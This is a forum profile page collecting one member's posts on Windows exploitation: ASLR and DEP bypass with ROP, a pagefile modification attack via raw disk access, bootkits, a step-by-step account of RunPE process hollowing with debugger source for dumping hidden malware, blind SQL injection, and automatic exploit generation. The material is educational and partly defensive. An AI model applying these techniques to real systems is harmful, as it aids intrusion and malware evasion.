Jump to content

ionut97

Active Members
  • Posts

    233
  • Joined

  • Last visited

  • Days Won

    14

Everything posted by ionut97

  1. Exploits 2: Exploitation in the Windows Environment Lab Requirements: Windows XP SP3 Virtual Machine with the following installed: Windows Platform SDK 7.0 or 7.1 (optional debugging tools need to be installed) Microsoft Visual C++ express 2008 HXD hex editor Author Comments: This course covers the exploitation of stack corruption vulnerabilities in the Windows environment. Stack overflows are programming flaws that often times allow an attacker to execute arbitrary code in the context of a vulnerable program. There are many nuances involved with exploiting these vulnerabilities in Windows. Window's exploit mitigations makes leveraging these programming bugs more difficult, but not impossible. The course highlights the features and weaknesses of many the exploit mitigation techniques deployed in Windows operating systems. Also covered are labs that describe the process of finding bugs in Windows applications with mutation based fuzzing, and then developing exploits that target those bugs.
      • 1
      • Upvote
  2. Bypassing Address Space Layout Randomization Toby ’TheXero’ Reynolds April 15, 2012 Contents 1 Introduction 3 2 Method 1 - Partial overwrite 3 3 Method 2 - Non ASLR 5 4 Method 3 - Brute force 6 5 Conclusion 6 http://www.thexero.co.uk/downloads/ASLR.pdf
      • 1
      • Upvote
  3. About the Pagefile Attack The pagefile attack is about to use the fact that Windows is swapping out memory into the pagefile. The attack is based on modification of the pagefile - so indirectly the physical memory. The idea is to find specific memory in the pagefile, modifying it, and letting Windows reloading it without any verification. But there are a few limitations to consider, the most important one is that you can not directly access the pagefile. The file "C:\pagefile.sys" is locked for access, you can not open it by CreateFile. The system process has an open handled without any Shared Access flag set, so any access to pagefile.sys will fail consequently. How to access the pagefile under Windows So how to access the pagefile? By bypassing the Windows File overhead. This can be done by not using the CreateFile/WriteFile functions but direct driver communication. Direct driver communication can be done through 2 ways (and the first is the Windows File Management again): CreateFile with a valid DOS device name or device name (i.e. "\\.\PhysicalDrive0") DeviceIoControl With the first you can open handles which can be used to send and receive (ReadFile, WriteFile) data to and from drivers. A driver can register a device name, and if you open a handle to the device you open a handle to the driver. Once opened, you can communicate with the driver, in the example you would directly do read/write operations on the hard disk (compare with Raw Sector Access). There was also an attack to physical memory, because the physical memory object "\Device\PhysicalMemory" was writable as non-Administrator in Windows XP (fixed in Service Pack 2). You can use the DeviceIoControl function to directly send control codes (IOCTLs, I/O Control Codes) to the driver. Control codes tell the driver what to do. For the function you also need an open handle, but in difference to file mapped driver communication you can open a handle with the correct, undocumented flags. After you opened a handle to the driver using CreateFile, you can send IOCTLs using DeviceIoControl. I'm glad to say that Microsoft started documenting the IOCTLs since late 2008, so there are now many documented IOCTLs in the connection with their next operating system Windows 7. The want people to NOT write drivers but use existing API functions. This is also a result from the fact that Windows Vista and newer only allow to load signed drivers, which means to have a company and pay for signing, and registering etc. So hows done the magic to access the pagefile? By using the correct IOCTLs and flags: Open handle to NTFS file system driver of the volume via CreateFile by specifying "\\.\C:\" as file name and FILE_READ_ATTRIBUTES as desired access flag Receive cluster list by calling DeviceIoControl with FSCTL_GET_RETRIEVAL_POINTERS IOCTL Calculate start sector and count by LCN (Logical Cluster Number), data run and NTFS volume info (Sectors per Cluster, Clusters per Record) Read the data runs directly using raw sector access Be sure to specify correct device name "\\.\[Drive Letter]:\" with the ending backslash, otherwise you would open a handle to the logical drive. The undocumented FILE_READ_ATTRIBUTES flag for the desired access allows you to send IOCTLs to the driver (but still forbids read/write IO). And this is exactly what we need, and what was done in the Pagefile Attack. You need to know about the internal NTFS file structure, how clusters are stored. There is a concept used called "Data Runs" (also appearing in FAT file system), which means that multiple clusters are stored and remembered in a list as one single data run. All runs together make the file. The list of the data runs is received by the IOCTL FSCTL_GET_RETRIEVAL_POINTERS, and each element consists of next VCN and LCN. Next VCN tells you the starting virtual cluster number (starting from zero) inside the file, and LCN the logical cluster number on the drive. This concept, receiving the cluster list with the IOCTL, works for both FAT and NTFS. I don't want to explain the full NTFS file system here but be aware of sparse data (= clusters which are fully zero, alpha compression), because they are not stored on NTFS but assigned as LCN -1. And do not forget compresson, encryption and resident data. Take a look at the NTFS documentation. Limitations Like given in my Hibernation File Attack, the Pagefile Attack has also its limitations. First you need elevated Administrator rights for the driver communication. Second the Pagefile Attack works only up to Windows XP, Microsoft fixed the vulnerability in Windows Vista Release Candidate in response to the public presentation of the pagefile attack. Furthermore its important to say that it is a relative high expenditure to find and replace specific memory in the pagefile, so it is only limited qualified for real exploits used by malware. References Vista RC2 vs. pagefile attack (and some thoughts about Patch Guard), Joanna Rutkowska in her blog "invisiblethings" Subverting Vista Kernel For Fun And Profit - presentation at Black Hat USA 2006 Rutkowska's profile on Black Hat USA 2006 Sursa: Pagefile Attack - Peter Kleissner
  4. Abstract In my third paper I want to talk about "The Magic of Bootkits". Boot-Software was occupying me for years in my life time. I wrote an operating system, a boot management solution and at last a "Forensic Lockdown Software" which boots before Windows does. I have seen many stuff there and so I want to discuss a few points of bootkits, whether they become useless or not, whether they will rule the world or not. I am writing this article because I read Pandalabs Security article about "Rootkits in the MBR, a dangerous reality" and I have analyzed development work of vbootkit which I will discuss later. Enjoy reading! - Peter Kleissner, Software Engineer (September 2008) The dangerous of Bootkits Bootkits are loaded before the main operating system is. The term 'Bootkit' refers to a Rootkit installed in any Boot Record (Master Boot Record, Partition Boot Record, Bootloader). Modern Bootkits are able to hook and bypass operating system routines, initialization (processor mode switch) as long as security checks (integrity, code-signed, etc.). They are not only acting on startup, but also during execution of the host operating system. Because Bootkits are loaded before the OS is, they can do what they want (at least what the programmer is capable of letting them do). In normal they do not only hook operating system kernel functions but also give themself kernel rights and do other various things. How to consider Bootkits Bootkits differ in their code with common viruses, they are assigned like any other system software directly to machine code the processor executes. Simplified but like Windows they have to support the hardware by their own code, they need their own drivers for graphics, reading from disk etc. An important aspect of system software is the hardware platform and architecture. Boot viruses must be written for a specific architecture (for "normal" computers is the Intel Architecture and classical PC Architecture), so there is a hardware dependency normal software hasn't. Problems for boot viruses are not only the architecture, but the lacking documentation of it. For example, the boot process is a very undocumented way of, which makes it difficult to get a boot software working on nearly any machine. Different computers will support different important features which are required or not. You can consider bootkits as a high-changing required applications. Unstandardized hardware is one problem, but new standards for previous architecture parts another. We have for example the new GUID Partition Table which replaces the old one, or the BIOS thats ought to be replaced by EFI. For the new Extensible Firmware Interface, you can throw away any previous boot software and write new one. Another problem beside hardware dependency is target operating system dependency-, the bootkit has to hook operating systems kernel functions and bypass the operating systems security functions. Current bootkits are targeted to operating system versions like specific to Windows XP, Windows Vista or some Linux Kernel. Its also tricky with 32 and 64 bit of operating system versions. It would be possible, but currently not used to include binary code for both different operating system versions. How to detect a Bootkit For bootkit detection, I've already worked out a concept for detecting malicious boot software, described in my article Writing a Boot Scan Engine. It's about to scan for patterns, using a black and whitelist, a database, reports and other heuristic methods. When detecting an infected system for a bootkit it is important to know the bootkit is able to hook functions that are used for detection. An example would be the common hooked function ReadFile, which would - in case - return different data then the real one. Of course the computer can be scanned from a live system, but this would be unuserfriendly crap. A solution would be a scanner which is loaded before the main operating system parts are loaded, a place for the scanner would be (Windows specific) in the Windows Bootloader or the Winloader.exe. The problem of Bootkits in the future with EFI A big change for boot viruses relies in the change of the old-fashioned BIOS to the new Extensible Firmware Interface (EFI). It makes the old BIOS and bootstrap obsolete and defines new standards for booting operating systems. For the first, old boot viruses will no longer work and can not be "translated" to the new boot system. For the second, we will have much more boot viruses in future within the next 10 years. With new versions of Microsofts operating systems they will explode, because they have the ability to. EFI makes it very easy to develop a boot loading software- or to develop a boot virus or bootkit. EFI brings better and more standardized support for hardware and supports features like the Portable Executable format that is used in Windows for executables. It's just a matter of time until we have easy to use compilers like Visual Studio for developing EFI applications. When we have this, it's very easy to copy & paste malicious boot software source code. I think the explosion will come in 2-3 years until EFI is etablished and people begin to use its possibilities. Conclusion We see a current change in bootkits and in the development of it in the near future. It's incredible to see the effort people are taking to in order to write a full functional bootkit. The good thing on previous bootkits is only experts are capable of writing them, so modern malicious bootkits (the non proof-of-concept ones) are simply not available this time. In 2-3 years we will see a change in bootkits when EFI is etablished, but until EFI applications are nearly like Windows applications, they can be easily found by anti-virus software. See you in 2-3 years, Peter Kleissner. Sursa: The Magic of Bootkits - Peter Kleissner
      • 1
      • Upvote
  5. The Art of Bootkit Development Peter Kleissner Windows 8 Bootkit Live Demonstration This shows how to use Stoned Lite to get SYSTEM rights on Windows 8 through the cmd privilege escalation (done by a driver loaded by the bootkit). The infector is just 14 KB of size and bypasses the UAC.
  6. Google Chrome 22 include mai putine noutati decat versiunea precedenta a browserului Google, dar una dintre ele este cu adevarat notabila: un plugin ce mareste securitatea Flash pentru Windows. Vulnerabilitatile Adobe Flash sunt una dintre exploatarile folosite cel mai de des de aplicatiile malware, insa Google Chrome 22 includ plugin-ul Peppet (PPAPI), ce ofera cea mai mare siguranta impotriva virusilor, scrie Geek. Google Chrome 22 imbunatateste securitatea Flash pentru Windows Noul plugin Flash din Google Chrome 22 ruleaza in acelasi sandbox considerat pana acum invulnerabil in fata tentativelor de hacking, iar PAPPI a redus si numarul de erori cauzate de Flash cu 20%. Versiunea de Linux a Google Chrome foloseste plugin-ul Flash de mai bine de 2 luni, dar acum securitatea sporita soseste si pe Windows 7 si Windows 8. Google Chrome este singurul browser ce poate afisa continut Flash in interfata Metro in afara de Internet Explorer 10, in care Flash functioneaza doar pe un numar redus de pagini. Sursa: Google Chrome 22 imbunatateste securitatea Flash pentru Windows | Hit.ro
  7. RunPE in a nutshell RunPE is a technique often used by (novice) virus authors to hide their viruses from an anti-virus scanner. It works by using a small launcher application that has the executable virus file embedded in an encrypted state. The easiest way to launch the executable would be to write a decrypted version of the virus to a file, but this would give the anti-virus scanners a chance to detect and subsequently disable it. Instead, the RunPE loader runs an innocent application and replaces its loaded process image with the virus. To understand the reasoning in the rest of the document, it's important that you understand how running a process from a memory buffer works from a technical point of view. First, the RunPE loader launches an innocent process using the CreateProcess API. The process is launched using the CREATE_SUSPENDED flag. This will suspend the process right after it is mapped into memory, but before the windows PE loader loads all additional library files. Next, the RunPE loader calls GetThreadContext on the main thread of the newly created process. The returned thread context will have the state of all general purpose registers. The EBX register holds a pointer to the Process Environment Block (PEB), and the EAX register holds a pointer to the entry point of the innocent application. In the PEB structure, at an offset of eight bytes, is the base address of the process image. The loader calls NtUnmapViewOfSection. This function will unmap all the mapped sections of the innocent executable, freeing up the memory space for the virus to be mapped in. Then the loader reads the headers of the decrypted virus, and maps the headers and all sections into the innocent process using WriteProcessMemory. The correct memory page permissions are set using VirtualProtectEx. The loader writes the new base address into the PEB and calls SetThreadContext to point EAX to the new entry point. Finally, the loader resumes the main thread of the target process with ResumeThread and the windows PE loader will do it's magic. The executable is now mapped into memory without ever touching the disk. Plan of attack The weaknesses of RunPE should be obvious to anyone: At some point the loader has to decrypt the excutable in the loader's memory space. Furthermore, the original executable will be mapped in the target process' memory space in a readable state, you can easily dump the executable into a file. My first instinct was to try OllyDBG with the OllyDump plugin. Sadly, the RunPE loader left the process in a mutilated state, causing the plugin to fail. Another way to solve the problem would be forcing the RunPE loader to write the executable to a file instead of to the memory space of another process. The easiest way to achieve this is by hooking the WriteProcessMemory calls. You have to place the hooks before the RunPE loader ever gets control of execution, this proved to be quite challenging when the RunPE loader is written in a .NET language (and it often is, the people using this technique usually aren't very good at what they do). To solve this I decided to create my own debugger application that places an int3 breakpoint on WriteProcessMemory and reads the required data straight from the RunPE loader process with ReadProcessMemory. The Source The code I have so far does its job but is quite dirty. There is no real design behind it, I just started coding and fixing stuff as I thought about it. It also doesn't yet create a real decrypted executable but instead creates binary files for each WriteProcessMemory call. I haven't tested how anti debugger techniques react on this debugger yet. IsDebuggerActive() will return true for sure, but that can easily be prevented. How it reacts on tricks with exception handlers is something I have to test. I'd like to eventually expand this code to some sort of simple debugger framework where you can execute callback functions for every breakpoint. Not sure if I'll ever be motivated enough though. C:\>debugger.exe target.exe Process target.exe Loaded at 00400000 Handling exception chain... Unknown Breakpoint at 7C90120E Creating breakpoint (WriteProcessMemory) at 7C802213 Handling exception chain... Exception at 7C812AFB type 4242420 Handling exception chain... Breakpoint (WriteProcessMemory) at 7C802213 getting stack... WriteProcessMemory was called at address 4000000 on buffer b3adf8 with length 14 Process closed with exit code 0 C:\>cat 4000000.bin Hello this is a test C:\> #include <iostream> #include <string> #include <map> #include <vector> #include <iomanip> #include <sstream> #include <algorithm> #include <functional> #include <fstream> #include <Windows.h> #include <TlHelp32.h> typedef void (*BreakpointCallback)(HANDLE proc, HANDLE thread); struct Breakpoint { std::string name; unsigned char originalBytes[2]; BreakpointCallback callback; // Not yet used }; typedef std::map<std::string, MODULEENTRY32> ModuleMap; typedef std::map<void *, Breakpoint> BreakMap; bool DumpDataToFile(HANDLE proc, DWORD address, DWORD bufferAddress, DWORD length) { std::stringstream filename; filename << std::hex << address << ".bin"; std::ofstream outfile(filename.str(), std::ofstream::binary | std::ofstream::trunc); char *buffer = new char[length]; ReadProcessMemory(proc, reinterpret_cast<void *>(bufferAddress), buffer, length, NULL); outfile.write(buffer, length); delete[] buffer; return false; } bool UpdateModuleList(int pid, ModuleMap& moduleList) { HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, pid); if(snap == INVALID_HANDLE_VALUE) return false; MODULEENTRY32 me; moduleList.clear(); Module32First(snap, &me); do { std::string key = me.szModule; std::transform(key.begin(), key.end(), key.begin(), std::ptr_fun<int, int>(tolower)); moduleList[key] = me; } while (Module32Next(snap, &me)); return true; } // I only place breakpoints on WINAPI functions so I write 2 bytes: // mov edi,edi becomes int3 // nop // so I don't need to do anything special to handle the breakpoint, it will just continue with the nop // and then follow the function prologue bool ToggleInt3Breakpoint(void *address, std::string name, BreakMap& breakList, HANDLE proc) { BreakMap::iterator bpit = breakList.find(address); if(bpit != breakList.end()) { // Rewove existing BP std::cout << "Removing breakpoint (" << bpit->second.name << ") at " << address << std::endl; if(!WriteProcessMemory(proc, address, bpit->second.originalBytes, 2, NULL)) return false; breakList.erase(address); } else { // Create new BP Breakpoint bp = {name, 0, 0, NULL}; std::cout << "Creating breakpoint (" << name << ") at " << address << std::endl; if(!ReadProcessMemory(proc, address, bp.originalBytes, 2, NULL)) return false; if(!WriteProcessMemory(proc, address, "\xCC\x90", 2, NULL)) return false; breakList[address] = bp; } return true; } bool PlaceBreakpoints(ModuleMap& moduleList, BreakMap& breakList, HANDLE proc) { ModuleMap::iterator kernel32 = moduleList.find("kernel32.dll"); if(kernel32 != moduleList.end()) { void *wpmAddress = GetProcAddress(GetModuleHandle("kernel32.dll"), "WriteProcessMemory"); ToggleInt3Breakpoint(wpmAddress, "WriteProcessMemory", breakList, proc); return false; } else return true; } bool GetStack(int slots, HANDLE thread, HANDLE proc, std::vector<DWORD>& stack) { CONTEXT context; context.ContextFlags = CONTEXT_ALL; std::cout << "getting stack..." << std::endl; if(!GetThreadContext(thread, &context)) return false; for(int i = 0; i < slots; i++) { DWORD slot; if(!ReadProcessMemory(proc, reinterpret_cast<void *>(context.Esp + (i * 4)), &slot, sizeof(DWORD), NULL)) return false; stack.push_back(slot); } return true; } // We handle the breakpoints here (and potential other exceptions) void HandleException(DEBUG_EVENT de, BreakMap& breakList, HANDLE proc) { std::cout << "Handling exception chain... " << std::endl; EXCEPTION_RECORD *exception = &de.u.Exception.ExceptionRecord; do { BreakMap::iterator bp = breakList.find(exception->ExceptionAddress); if(exception->ExceptionCode == EXCEPTION_BREAKPOINT && bp != breakList.end()) { std::cout << " Breakpoint (" << bp->second.name << ") at " << exception->ExceptionAddress << std::endl; if(bp->second.name == "WriteProcessMemory") { std::vector<DWORD_PTR> stack; HANDLE thread = OpenThread(THREAD_GET_CONTEXT | THREAD_QUERY_INFORMATION, false, de.dwThreadId); GetStack(6, thread, proc, stack); CloseHandle(thread); std::cout << "WriteProcessMemory was called at address " << stack[2] << " on buffer " << stack[3] << " with length " << stack[4] << std::endl; DumpDataToFile(proc, stack[2], stack[3], stack[4]); } } else if(exception->ExceptionCode == EXCEPTION_BREAKPOINT) std::cout << " Unknown Breakpoint at " << exception->ExceptionAddress << std::endl; else { std::cout << " Exception at " << std::hex << exception->ExceptionAddress << " type " << exception->ExceptionCode << std::endl; MessageBeep(0); Sleep(100); } } while (exception = exception->ExceptionRecord); } int DebugMain(std::string targetPath) { STARTUPINFO si = {0}; si.cb = sizeof(si); PROCESS_INFORMATION pi; if(!CreateProcess(targetPath.c_str(), NULL, NULL, NULL, FALSE, DEBUG_PROCESS, NULL, NULL, &si, ?)) { std::cerr << "Error while creating process: " << GetLastError() << std::endl; return EXIT_FAILURE; } DEBUG_EVENT de; bool keepLooping = true; bool needBreakpoints = true; ModuleMap moduleList; BreakMap breakList; while(keepLooping && WaitForDebugEvent(&de, INFINITE)) { switch(de.dwDebugEventCode) { case LOAD_DLL_DEBUG_EVENT: case UNLOAD_DLL_DEBUG_EVENT: UpdateModuleList(pi.dwProcessId, moduleList); break; case CREATE_PROCESS_DEBUG_EVENT: std::cout << "Process " << targetPath << " Loaded at " << de.u.CreateProcessInfo.lpBaseOfImage << std::endl; break; case EXIT_PROCESS_DEBUG_EVENT: std::cerr << "Process closed with exit code " << std::hex << de.u.ExitProcess.dwExitCode << std::endl; keepLooping = false; break; case EXCEPTION_DEBUG_EVENT: HandleException(de, breakList, pi.hProcess); break; default: break; } // Place breakpoints as soon as kernel32 is loaded if(needBreakpoints) needBreakpoints = PlaceBreakpoints(moduleList, breakList, pi.hProcess); ContinueDebugEvent(de.dwProcessId, de.dwThreadId, DBG_CONTINUE); } return EXIT_SUCCESS; } int main(int argc, char **argv) { if(argc != 2) { std::cerr << "Usage: " << argv[0] << " <executable path>" << std::endl; return EXIT_FAILURE; } return DebugMain(argv[1]); } Sursa: https://thunked.org/programming/decrypting-runpe-malware-t110.html
  8. Description: In this video Machael Buselli talking about Blind SQL Injection and some ways that how attackers can inject malicious behavior to gather information from your system for bad propose. Michael Buselli's talk begins by briefly discussing the dangers and counter-measures of SQL injection. It then focuses on a particular, little known variant called blind SQL injection that is often overlooked. This talk is full of examples which show the dangers of SQL and blind SQL injection. Machael Buselli: - Michael is a software developer that also has significant experience in systems administration and security architecture. Michael presently works as a Ruby on Rails consultant at Aon Hewitt. Source : - Blind SQL Injection w/Michael Buselli - software craftsmanship mchenry county Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: SCMC August 2011- Blind SQL Injection by Michael Buselli on Vimeo
  9. AEG: Automatic Exploit Generation on Source Code The automatic exploit generation challenge we address is given a program, automatically find security-critical bugs and generate exploits. Our approach uses a novel formal verification technique called preconditioned symbolic execution to make automatic exploit generation more scalable to real-world programs than without it. We implemented our techniques in a system called AEG, which we use to automatically generate 16 exploits for 14 open-source projects. Two of the generated exploits are against previously unknown vulnerabilities. The hard part, in our experience, was exploring the state space efficiently to find bugs, determine the problem, and generate an initial input that triggers the bug. The core of our paper is a technique called preconditioned symbolic execution, which provides better scalability for finding exploitable bugs than when using previous symbolic execution techniques. The main idea is to guide symbolic execution to program paths that are more likely to be exploitable. Basic symbolic execution tends to try and explore all paths, which is more expensive. Our implementation is built on top of KLEE, a great symbolic execution engine from researchers at Stanford. We are very excited about these results, and think they show a real step forward in state of the art. Don't take this to mean we believe it's a solved problem. Our future work focuses on scaling to larger and more programs, to more types of exploits, and to other relevant problem settings. There is plenty still to do. We presented our paper at NDSS 2011. The most current copy of our paper. PDF BiBTeX Help us find typos in our paper and join our thank you list. The camera-ready version for NDSS. The above is the update; this is here mostly for historical reasons. PDF For those of you interested in watching, we've prepared a youtube video of our experiments. We have a short talk that gives a high-level overview of our take on the problem, the direction, and our project. Also note that due to youtube time lengths, we left out several important things such as the related work. That stuff is important, but we just couldn't fit everything in. Please see the paper for more information. As a random link related to exploits, CMU runs a Capture the Flag team. See their website :: Plaid Parliament of Pwning ::. Sursa: http://security.ece.cmu.edu/aeg/
  10. De unde stiu ei ca a fost doar unul? L.E: Inca mai au deface pe celalalt domeniu. http://demitel.ro/
  11. More recently I have researched methods on bypassing two security protection mechanisms under windows that have proven quite difficult. Whist this is nothing new, I will provide the understanding I have of the techniques and show you a brief demonstration of the approach I took. We will discuss this techniques in relation to stack based buffer overflows only for now. What is interesting is that each one protection mechanism individually are not difficult to bypass, just when they are combined together we are presented with a difficult hurdle. Lets investigate why, by explaining what the security mechanisms actually do and then using a proof of concept to help readers visualize the process. What is ASLR? Address space localization randomization is nothing more than randomizing the high byte order of any address within the PEB (process environment block). Generally under windows XP and prior versions we see addresses that never change under the windows libraries. So for example the address from kernel32.dll for WriteProcessMemory() will always be at 0x7C802213. But of course, newer versions of windows have changed this, so that now an address will be randomize like this: 0xXXXX2213 (The offset will be different too under Vista and 7, this is just an example). One important point too make is that we will always know the offset too where the functions lye in any given module. This is known as the relative offset, and will come into play when we attempt to bypass this security. Ok so as you can see, in a typical EIP or SEH exploit, we would not have too many dramas bypassing this as a lot of modules that come with applications are not using ASLR and essentially we could just find an instruction that will take us too our attacker controlled buffer. However if our target application came with no additional modules, or they were all ASLR protected, or loaded with a dynamic base (using nulls) then we would have serious issues bypassing this technology. We are generally more than unlikely too see this situation due to compatibility issues. ASLR Bypass techniques: Bruteforcing (as long as the parent process spawns child processes). Generally, this would only be possibly in server environments. Entropy is small in 32bit processors. Using a call to a DEP bypassing function from within a non ASLR module. This way we dont even have to know the address at all, we can rely on code that comes inside the applications modules. Leak an pointer to a windows modules from the stack or heap memory. As long as we can create the relevant chains, then this process works. While this is nice, we will face another hurdle. Hardware enforced data execution prevention, that will stop the execution of attacker supplied code in memory. What is DEP? DEP is a CPU flag set to indicate that the NX is on (non-executable). Any attacker supplied code in either the heap or stack memory will not be executed and cause an access violation. For an attacker to bypass this issue they must execute a ret2libc type exploit where the attacker uses system API's to mark memory pages as executable or move the shellcode to an executable region and jump on it. In a stack based exploit, this will require the attacker to use a technique called Return Oriented Programming (ROP). This will allow an attacker to continually return to the stack and execute the next instruction until the shellcode is executed. DEP Bypass techniques using windows API: WriteProcessMemory() WinExec() VirtualProtect() The three API functions above, will enable the attacker to control the execution of shellcode. I will not go into detail about these functions as there is already a lot of material on the subject. Its important to point out that WinExec() will not execute a traditional payload and you will have to be creative with this technique if that's all you can use. Limitations: Less character filtering the better (limited character set means limited ROP chains.) Need lots of space. Although this is not ALWAYS the case, generally speaking we will need a decent amount of room for generating the stage 0 shellcode (the ROP chain). We need at least one library that is not ASLR protected (That also does not have a randomized base (although this will make is VERY hard, still not impossible)). Due to these limitations alone, many applications under the new Windows OS's will not be exploitable (assuming DEP is on). Unicode vulnerabilities, ASCII vulnerabilities, and Vulnerabilities where one no additional libraries can be provided will not work. Putting it all together, visualize! First and foremost, you need to be able to 'visualize' how the exploitation will pan out. You need a plan from start to finish and be willing to change your plan completely is need be. First of all, get yourself some ROP chains either by using !pvefindaddr or by manually searching. Once you have that, visualize this process: Find an address to kernel32.dll (Leak, brute-forcing or call to windows API from the applications non ASLR modules. etc) Store the address somewhere Calulate the dynamic arguments for your windows API call (that will be used to bypass DEP). Place them carefully either in the Data segment or the stack segment Align them correctly and call the function The handler will return us to the location we specified (unless your using the WriteProcessMemory() technique that patches itself.) Blaze DVD (.plf) file local buffer overflow PoC Vid download here Sursa: https://net-ninja.net/article/2010/Jun/17/bypassing-aslr-and-dep/
  12. Link: [ Shell-Storm.org ] | Papers | Destul de multe si interesante. Cateva exemple : Defeating DEP through a mapped file X86/Win32 Reverse Engineering Cheat-Sheet Intel Assembler CodeTable 80x86 The Linux Kernel Module Programming Guide Exploiting the iOS Kernel The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86) Return Oriented Programming Recovering the Toolchain Provenance of Binary Code SH-4 CPU Core Architecture Non-Executable Stack ARM Exploitation Research Paper ARM IAR Assembler - Reference Guide - for Advanced RISC Machines Ltd - ARM Cores Bypassing SEHOP ASLR - Address Space Layout Randomization
      • 1
      • Upvote
  13. “Choose a job you love, and you will never have to work a day in your life” said Confucius. These would be the words that describe Marius Corîci the most. In 2003 he started doing business in the plumbing industry and co-founded ITS Group, a franchise for Romstal Company, the biggest plumbing installations retailer from South-Eastern Europe. In 2007 he moved into Artificial Intelligence field and founded Intelligentics, a group for Natural Language Processing. Now, he is very focused on infosec and got involved in all the biggest independent security projects in Romania: S3ntinel, Hack Me If You Can, Hack a Server and DefCamp. Marius considers himself a serial entrepreneur and is very passionate about Artificial Intelligence. Never a quitter, always a perfectionist, looking for challenges that will change the world we live in. He believes in people and the power of great teams, and he intends to start blogging in the near future. What determined you to shift your attention towards software development industry? Besides the great opportunities, I am a guy who loves challenges. I started to like developing digital products and I belive that the online industry will increase growth in the near future. Hacking Servers What is Hack a Server? HaS (Hack a Server) is a platform designed for conducting manual penetration tests using the power of crowdsourcing, covered by anonymity and confidentiality. It's a fact that communities and individuals who love to discover and test security issues already exist. Whether they are called black, grey or white hackers, crackers, skiddies, PenTesters you name it, they love to find flaws and vulnerabilities. They love challenges and every flaw or vulnerability represents a challenge for them. This is the truth. When your system or production server gets hacked in real life, peaceful intentions are the least to expect. Trust me, we’ve been there having our platform “tested” and tested. Thanks God we don’t keep any sensitive data about our users on the platform. HaS brings security skilled people in the same place and gets them paid for what they love doing most: Hacking. Everybody can register to our platform, but only the best will have access to “Playground Arena”, where all the hacking happens. In order to get access to the “Playground Arena”, they will first have to pass a test. We all know that the most important thing when someone finds holes into your system is not the penetration itself but the report that describes the security issues and the solutions. That report is the most important thing for a CTO, Sys Admin or web app developer. The test that a HaS user has to pass in order to get access for hacking, is like any other tests that they should pass in order to get different security certificates (e.g. CPTC, OSPC, CEH, CEPT, CISSP etc). The only difference is that we give this opportunity to all our users and we don’t charge for it. This test ensures CTOs, Sys Administrators and web apps developers that whenever they will pay and receive a Penetration Test Report, it will comply Penetration Test Standard Reports. How did you come up with the idea behind HaS platform? I use to say: Solve a problem, then, build a product. There were two ingredients that make me come up with this idea: Gaming: I hate gaming because if you are not aware, it's like a drug. Security: Security is one big problem, believe me. One day, being with my little daughter at a doctor and waiting to get in, I was thinking „how can you use gaming in such a way to solve a big problem?” And it strike it me. Online Security Gaming but in another way that it hasn’t been done before. Using the power of crowd source, and not for points (as was done until now), but for real money. After I figured out the outlines, I grabbed the phone, called a friend who’s Sys Admin and asked if he would use such platform and how much would pay for this service. He said yes, he would use such service and he would pay like 1000 Euros. …And here we are. If you think deeper, we solve a few other complementary problems, like hackers that ware black hats, can become grey and start earning real money for what they love most: Hacking Servers. Moreover we fill up a niche between companies that perform penetration tests with high rate cost for small and medium companies and those companies. In fact we don’t even compete with those companies and we complete them. And I can add at least two or three more good things like being sys admin or tester on our platform you get the opportunity if you are in „Hall of Fame” to become consultants on InfoSec issues. Building the product Who is currently working to bring out HaS platform to the world? I’ve tried many, we left few. Marius Chis is currently CFO and the first investor in this project. I tried to involve people that fall in love with the project because I’m a strong believer that money is a consequence of a “well done job” and not a purpose. Andrei Nistor, is the CTO. He is the one who did the most of the coding part, based on relevant feedback from team members or testers. He worked day and night to get the project working flawless, and made crowdsourcing pentesting possible. Alexandru Constantinescu, is the PR & Marketing Executive. He impressed me with his determination when he told me how much loves the project and wants to jump in on marketing side with no initial financial interest, because he understands the development stages of a bootstrap leanstartup company. Cosmin Strimbu is our frontend developer. Although I didn’t meet him at the time I’m being interviewed, the same like Alexandru, he just asked me to take him on board. I love this kind of people driven by passion of what they doing and not by money. Am I lucky? Yes and no. Lucky because They find me (not otherwise) and They find the project. Not lucky because I worked hard to spread the word about me and my projects. No, this is not luck, this is hard work. I have spent over 3 years in online industry, and although I’ve meet a lot of people, I would recommend just a few. What is the business model that will bring you revenue from HaS? We had a few business models in mind, but since we are dealing with a two sided market place we have decided to charge at a decent percentage those who get paid. That means low rates costs at a fraction comparing with penetration test companies, and we are aiming towards a mass adoption price. Who are your customers? HaS customers are companies that wants to solve their security issues fast and with low costs. CTOs CIOs CISOs, Sys Administrators, Data Base Administrators, Web Apps Dev are also the professionals within companies that can use our product. Other customers are the individual specialists, whether they are PenTesters, Sys Administrators, who want to verify the security of their innovative servers or applications, covered by what we value most, anonymity and confidentiality. What are the current features of hackaserver? Hack a Server is the next level solution to resolve critical security issues in a funny war game way. Cost effective: What can be better for your business than The Power of Crowd Source at cost of a fraction? It’s Fast, Reliable and Secure. Fast: Within minutes you can setup your server with most popular OS and start to configure. I think we have like 7 clicks to have a machine up and running Reliable: Our PenTesters must pass a test and complete a Penetration Test Report to see if they really can be PenTesters before they get access to hack into Playground Arena. Secure: At Hack a Server, we encourage you not to disclose your real identity whatever you are a company representative or a pentester. In this way, we don’t keep sensitive data on our platform which means that no matter if someone will try to penetrate our system. They will find nothing. What’s next? Are there new features to be implemented into the platfom? Ha! There are a lot of features that we want to implement. We have a top three features but better for us is to let our customers to decide what they want most. On the second thought we have one that we believe will help CTOs, sys administrators, web apps dev and companies: Finding the best way to automate the process to replicate a physical machine on our platform. Now this is a challenge and we will start as soon as we close this iteration (I think?!). How you intend to penetrate the market? Hack a Server will become official platform for gamming at DefCamp a premier InfoSec Conference that will held on September 6-8 in Cluj-Napoca City at Hotel Napoca. The virtualization module we make it open source so everybody who wants to deploy fast a PenTest lab can free of charge. The virtualization module we intend to implement within faculties so the students will have a funny way to learn security. Those are a few directions, part of our market strategy. Sursa:Hack a Server - The man behind the idea | The Hacker News
  14. http://video.google.com/videoplay?docid=4756951231544277406 A presentation about the Heap Feng Shui technique for exploiting heap corruption vulnerabilities in browsers by Alexander Sotirov. Video recorded at BlackHat USA 2007.
      • 1
      • Upvote
